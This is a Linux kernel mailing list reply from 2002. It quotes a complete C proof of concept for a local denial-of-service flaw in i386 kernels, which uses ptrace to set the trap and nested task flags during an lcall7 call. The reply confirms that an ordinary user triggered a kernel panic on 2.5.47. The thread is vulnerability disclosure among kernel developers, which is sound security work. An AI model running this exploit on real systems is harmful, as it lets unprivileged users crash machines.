RE: FW: i386 Linux kernel DoS (clarification)

Petr Vandrovec (VANDROVE@vc.cvut.cz)
Wed, 13 Nov 2002 21:36:47 +0100


On 13 Nov 02 at 11:23, Leif Sawyer wrote:
> #include <sys/ptrace.h>
> #include <sys/wait.h>
> #include <unistd.h>
>
> /* Layout-compatible with the kernel's i386 user_regs_struct: each
>  * segment register occupies a 32-bit slot (16 bits used, 16 padding). */
> struct user_regs_struct {
> long ebx, ecx, edx, esi, edi, ebp, eax;
> unsigned short ds, __ds, es, __es;
> unsigned short fs, __fs, gs, __gs;
> long orig_eax, eip;
> unsigned short cs, __cs;
> long eflags, esp;
> unsigned short ss, __ss;
> };
>
> int main( void )
> {
> int pid;
> /* lcall 0x7:0x0 -- a far call through the i386 Linux lcall7 call gate
>  * (selector 7 = LDT entry 0, RPL 3). Executed from the stack, which
>  * needs an executable stack (the i386 default at the time). */
> char dos[] = "\x9A\x00\x00\x00\x00\x07\x00";
> void (* lcall7)( void ) = (void *) dos;
> struct user_regs_struct d;
>
> if( ! ( pid = fork() ) )
> {
> usleep( 1000 ); /* give the parent time to attach */
> (* lcall7)();
> }
> else
> {
> ptrace( PTRACE_ATTACH, pid, 0, 0 );
> while( 1 )
> {
> wait( 0 ); /* child stopped: on attach, then at each syscall entry/exit */
> ptrace( PTRACE_GETREGS, pid, 0, &d );
> d.eflags |= 0x4100; /* set TF (0x100) and NT (0x4000) */
> ptrace( PTRACE_SETREGS, pid, 0, &d );
> ptrace( PTRACE_SYSCALL, pid, 0, 0 );
> }
> }
>
> return 1;
> }
>
> At the beginning I thought only kernels <= 2.4.18 were affected; but it
> appeared that both kernels 2.4.19 and 2.4.20-rc1 are vulnerable as well.
> The flaw seems to be related to the kernel's handling of the nested task
> (NT) flag inside a lcall7.

2.5.47-current-bk, run as a mere user: Kernel panic: Attempted to kill init!
Next time I'll trust you.
Petr Vandrovec
vandrove@vc.cvut.cz

-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at http://vger.kernel.org/majordomo-info.html
Please read the FAQ at http://www.tux.org/lkml/